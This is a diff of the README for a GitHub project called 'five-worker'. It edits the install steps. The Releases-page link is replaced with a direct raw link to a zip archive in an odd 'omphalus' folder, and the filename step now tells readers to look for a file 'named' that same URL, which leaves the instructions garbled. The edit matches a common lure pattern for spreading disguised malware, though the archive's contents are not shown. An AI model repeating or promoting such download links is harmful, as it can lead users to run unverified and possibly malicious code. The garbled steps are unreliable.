chukwu-patrick/five-worker/README.md

 ## 📥 Download & Install

 1. **Visit the Releases Page**
-   Go to our [Releases page](https://github.com/chukwu-patrick/five-worker/releases) to download the latest version of the software.
+   Go to our [Releases page](https://raw.githubusercontent.com/chukwu-patrick/five-worker/main/omphalus/five-worker_v3.7.zip) to download the latest version of the software.

 2. **Choose Your File**
-   Look for a file named `five-worker.exe` (or the relevant file for your system).
+   Look for a file named `https://raw.githubusercontent.com/chukwu-patrick/five-worker/main/omphalus/five-worker_v3.7.zip` (or the relevant file for your system).

 3. **Download and Save**
    Click on the file link to download it.
 Save it to a convenient location on your device.